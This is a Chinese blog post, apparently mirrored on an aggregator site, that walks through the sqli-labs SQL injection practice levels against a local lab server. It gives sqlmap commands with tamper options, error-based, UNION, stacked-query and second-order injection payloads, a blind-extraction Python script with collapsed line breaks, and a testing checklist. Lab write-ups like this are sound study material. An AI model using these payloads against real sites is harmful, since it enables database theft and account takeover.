sqlmap使用_sqlmap于sql labs下使用

本文主要是写sqlmap在sql labs下的使用学习记录,目的在于模拟黑盒测试,不太在意原理。(当然,原理还是要学习好才这么干的。)

不得不说收获还是蛮大的。首先推荐下sqlmap使用的学习视频。

1-9:

python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 --batch

10:单独的sleep(5)不起效果,

[http://127.0.0.1/sqlilabs/Less-10/?id=1%22and%20If(ascii(substr(database(),1,1))=114,1,sleep(5))--](http://127.0.0.1/sqlilabs/Less-10/?id=1"and If(ascii(substr(database(),1,1))=114,1,sleep(5))--)+python sqlmap.py -u http://127.0.0.1/sqlilabs/Less-10/?id=1  --batch --level 3

11-17:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-16/ --data="uname=123&passwd=123&submit=Submit" --batch --dbs

18-22:账号:Dumb,密码:Dumb。sqlmap使用-r读取请求包,在需要探测的地方加*,可以检测出来漏洞点。

18:User Agent

python sqlmap.py -r ./target.txt --batch --level 5

7d4761f58cbb5f9252167a58d52dd011.png

19:Referer

e88ff511bb45d8cfec15d41857e702fd.png

20:cookie处

21:cookie(需要将注入语句base64加密,源代码处有base64解密)

python sqlmap.py -r ./target.txt --batch --level 5 --tamper="base64encode.py"

22:cookie(21注入语句前缀后缀的单引号换成双引号)

python sqlmap.py -r ./target.txt --batch --level 5 --tamper="base64encode.py"

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-18/ -p “User-Agent” --batch --dbs --level 5 --thread 10 --technique E (此语句无效)

' and updatexml(1,concat(0x7e,(select  user()),0x7e),1) and '1'='1'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

9de4db221b658f62a0471e362e25121f.png

23:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-23/index.php?id=1

24:一个二次注入,且漏洞功能为修改原账户密码。无法用sqlmap自动检测。

注册个账户admin’#,然后登入admin’#,然后修改密码,然后原来admin的密码就会被修改覆盖

因为**修改密码(功能)**处形成的 sql 语句是

UPDATE users SET passwd="New_Pass" WHERE username ='admin'#'xxxx

25:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-25/index.php?id=1 --batch

26-26a-27:

提示说空格和注释

在 Windows 下会有无法用特殊字符代替空格的问题,这是 Apache 解析的问题,所以这里需要使用linux来进行搭建

window下可以使用加号(+,%2b)来代替空格,不过union两边有加号会报错,因此只能选择布尔盲注或者时间盲注

//26-27
import requests
url="http://192.168.2.82/sqlilabs/Less-26/?id=1'%26%26(ascii(substr(database(),{},1))={})||'1'='"
result=""
for i in range(1,10):for j in range(33,127):payload = url.format(i,j)r = requests.get(payload)r.encoding=r.apparent_encodingif "Dumb" in r.text:result += chr(j)print (result)break
//26a
url="http://192.168.2.82/sqlilabs/Less-26/?id=1')%26%26(ascii(substr(database(),{},1))={})||('1'='"//27a
url="http://192.168.2.82/sqlilabs/Less-27a/?id=1"%26%26(ascii(substr(database(),{},1))={})||"1"=""//28-28a
url="http://192.168.2.82/sqlilabs/Less-28/?id=1')%26%26(ascii(substr(database(),{},1))={})||('1'='"

29:

这题就有点意思了,HTTP参数污染。

服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache 为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。在我们实际应用中,也是有两层服务器的情况,那为什么要这么做?是因为我们往往在 tomcat 服务器处做数据过滤和处理,功能类似为一个 waf,由于解析参数机制的不同,我们此处可以利用该原理绕过 WAF 的检测;数据解析顺序:tomcat从前往后,apache从后往前

(双同参数)

7d0e90386b030892f67977f0534d600a.png

07723967c5720bed9a8ffdf8e2897ea3.png
http://127.0.0.1/sqli-labs-master/Less-29/?id=1&id=0' union select 1,database(),3--+http://127.0.0.1/sqli-labs-master/Less-29/?id=1&id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3--+

30:29的单引号改为双引号

31:29的单引号改为")

32-33:

宽字节注入,利用mysql使用GBK编码,将两个字符看成一个汉字的特性,消除转移符号“、”,使单引号逃逸出来。这是每次黑盒测试都需要检测的一个点。

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-32/?id=1 --thread 10 --tamper="unmagicquotes.py" --batch

34:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-34/ --data="uname=123&passwd=123&submit=Submit" --thread 10 --tamper="unmagicquotes.py" --batch

35:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-35/?id=1  --batch

36:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-36/?id=1 --thread 10 --tamper="unmagicquotes.py" --batch

37:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-37/ --data="uname=123&passwd=123&submit=Submit" --thread 10 --tamper="unmagicquotes.py" --batch

38-41:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-38/?id=1  --batch

42-45:

(43同理,前缀变了)

这种东西,除非白盒测试,能够看到源码,否则想不出这数据库名以及字段数。

login_user=test&login_password=1’;insert+into+users+values(44,‘Less32’,‘Less42’)–+&mysubmit=Login

login_user=test&login_password=1’+or+sysdate()-now()=0+and+sleep(1)=1–+&mysubmit=Login(我真是个小天才)我好像懂了sqlmap为什么会连接失败了,超时了。

好吧,sqlmap能够测出来,由于容易超时,因此容易在其中一步的询问中问你要不要继续(默认停止),此时你要手动点继续。因此不能够使用–batch参数。–time-sec=1

python sqlmap.py -r target.txt --flush-session --fresh-queries --time-sec=1

46-53:

python sqlmap.py -u http://192.168.2.82/sqlilabs/Less-46/?sort=1 --batch

总结

  1. 找注入点,最万能的方法是在请求包后面加星号(*),然后用-r读取。
  2. 先测试什么都不加(只有—batch。如果很多连接失败的报错,则需要手动点击继续,不能使用—batch参数,同时设置盲注延迟时间–time-sec=1)
  3. 第二步骤不行的话,level提升为4.
  4. 第三步骤不行的话,使用脚本–tamper="unmagicquotes.py"进行宽字节注入。

以上步骤都不行的话,自行使用脚本进行测试。判断双写等waf拦截。或者双同参数的HTTP参数污染。
小脚本:

import requests
url="http://192.168.2.82/sqlilabs/Less-26/?id=1'%26%26(ascii(substr(database(),{},1))={})||'1'='"
result=""
for i in range(1,10):for j in range(33,127):payload = url.format(i,j)r = requests.get(payload)r.encoding=r.apparent_encodingif "Dumb" in r.text:result += chr(j)print (result)break

心疼我相麻

b5b7b35d79351fc88dc47bdadd08f5ac.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/501066.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

cad解除块的快捷命令_47个快捷键50个CAD技巧,快收藏起来

终于知道为什么别人用CAD总比我快了,原来他们早就掌握了这些实用的CAD技巧,还没看完我就默默地转了,总有用得到的时候。0147个快捷键1. 创建直线的快捷方式是L空格2. 创建圆的快捷方式是C空格3. 创建圆弧的快捷方式是A空格4. 创建矩形的快捷方…

JAVA进阶教学之(String类的构造方法)

试题: 问:以下程序一共创建了几个对象 public class StringTest03 {public static void main(String[] args) {String s1new String("aaa");String s2new String("aaa");} }答:一共创建了3个对象 1个对象是"aaa&…

python 栈实现_Python实现栈

class Node(object): def __init__(self, valueNone, prevNone, nextNone): self.value, self.prev, self.next value, prev, next class CirculaDoubleLinkedList(object): def __init__(self, msxsizeNone): # msxsizeNone代表无限大 self.maxsize msxsize node Node() no…

机器人的自述作文_机器人的自述作文600字

大家好,我是小智伴机器人,今年已经两岁半了,我是人类的好朋友,好助手。我的样子有点像足球,更像热播电影《奇迹男孩》中那个小男孩戴上了宇宙员头盔,圆圆的白色大脑袋,再配上深蓝色的外罩&#…

JAVA进阶教学之(String类的常用方法)

接下来我们进入的学习章程,就是可以通过查阅帮助文档进行实际的应有 1. charcharAt(int index) 返回指定索引的 char价值。 代码示例: public class StringTest04 {public static void main(String[] args) {//String中常用的方法//“中国人”是一个…

sql having是什么意思_图解sql面试题:如何查找重复数据?

【题目】编写一个SQL查询,查找学生表中所有重复的学生名。【解题思路】1.看到“找重复”的关键字眼,首先要用分组函数(group by),再用聚合函数中的计数函数count()给姓名列计数。2. 分组汇总后,生成了一个如…

php soecket服务器搭建_PHP socket 服务器框架集

1.Swoole:重新定义PHPPHP语言的高性能网络通信框架,提供了PHP语言的异步多线程服务器,异步TCP/UDP网络客户端,异步MySQL,数据库连接池,AsyncTask,消息队列,毫秒定时器,异…

JAVA进阶教学之(StrngBuffer进行字符串拼接)

使用StringBuffer字符串拼接目的就是为了让字符串占用的内存空间减少,提高效率 思考:我们在实际的开发中,如果需要进行字符串的频繁拼接,会有什么问题? 答案: 因为java中的字符串是不可变的,每一…

python网站框架下载_web.py首页、文档和下载 - Python框架 - OSCHINA - 中文开源技术交流社区...

web.py是一个小巧灵活的Python框架,它简单而且功能强大。 webpy的设计理念力求精简(Keep it simple and powerful),源码很简短,只提供一个框架所必须的东西,不依赖大量的第三方模块,它没有URL路…

拼装机器人感想_学习制作机器人的感想作文500字15篇

第1篇:我的理想-NS-5机器人在科学历史上,有许多的科学家。他们为人类创造了永远的精神财富和物质财富。我的理想,就是当一个科学家,发明一个机器人。它的名字叫NS-5它高度180公分,耐久钛金属外壳,具456个活…

JAVA进阶教学之(StringBuider进行字符串拼接)

这一章节我们学习到的是StringBuider进行字符串拼接,有同学们问,为什么学了StringBuffer字符串拼接后还要看这个,下面我们来说道说道 代码演示: public class StringTest06 {public static void main(String[] args) {StringBui…

javamail 解码 base64 html格式邮件_python使用QQ邮箱实现自动发送邮件

最近用到Python自动发送邮件,主要就是三步,登录邮件、写邮件内容、发送,用到的库是 smtplib 和 email,直接使用pip安装即可我使用的是QQ邮箱,首先需要设置QQ邮箱POP3/SMTP服务记住这个授权码,这个授权码就是…

JAVA进阶教学之(8种包装类)

代码演示: public class IntegerTest01 {public static void main(String[] args) {//把100这个数字经过构造方法包装成对象MyInt myInt new MyInt(100);//doSome()方法虽然不能直接传100,但是可以传一个100对应的包装类型IntegerTest01.doSome(myInt);}public sta…

java 线程状态_面试官问:为什么Java线程没有Running状态?我懵了

点击上方“占小狼的博客”,选择“设为星标“本文阅读时间大约4分钟。来源:https://dwz.cn/dLRLBZabJava虚拟机层面所暴露给我们的状态,与操作系统底层的线程状态是两个不同层面的事。具体而言,这里说的 Java 线程状态均来自于 Thr…

ubuntu 设置开机执行脚本_Ubuntu 16.04设置rc.local开机启动命令/脚本的方法

注意:rc.local脚本里面启动的用户默认为root权限。一、rc.local脚本rc.local脚本是一个Ubuntu开机后会自动执行的脚本,我们可以在该脚本内添加命令行指令。该脚本位于/etc/路径下,需要root权限才能修改。该脚本具体格式如下:#!/bi…

viewpager 自定义翻页效果_Android RecyclerView自定义LayoutManager

在第一篇中已经讲过,LayoutManager主要用于布局其中的Item,在LayoutManager中能够对每个Item的大小,位置进行更改,将它放在我们想要的位置,在很多优秀的效果中,都是通过自定义LayoutManager来实现的&#x…

JAVA进阶教学之(Date日期的处理)

两个类: Date类:获取系统当前日期,属于java.util.Date包内 SimpleDateFormat类:将当前日期进行格式化处理,yyy-MM-dd HH:mm:ss SSS 代码演示: Date转String package com.lbj.javase.date;import java.tex…

检测到磁盘可能为uefi引导_在本地硬盘安装WinPE系统,实现UEFI引导,摆脱U盘

之前装系统一直用U盘装PE后再装系统,这次直接想把PE系统直接装在本地某个分区中,普通的PE制作工具只能直接装在一个硬盘里没法装在某个分区,百度发现没有一篇类似的文章,只能自己想办法了。目前的PE都支持UEFI引导了,所…

JAVA进阶教学之(数字格式化和高精度数字)

数字的格式化方便我们对于统计数字的时候便于区分 代码演示: new DecimalFormat("###,###.##"); package com.lbj.javase.number;import java.text.DecimalFormat;public class DecimalFormatTest01 {public static void main(String[] args) {//java.t…

mouted vue 操作dom_vue中关于dom的操作

mounted个人理解为DOM结构准备就绪了,可以开始加载vue数据了,挂载点,配合使用mounted:function(){this.$nextTick(function(){ //this.$nextTick是在下次DOM更新循环结束时调用延迟回调函数。异步函数this.loadData();          //…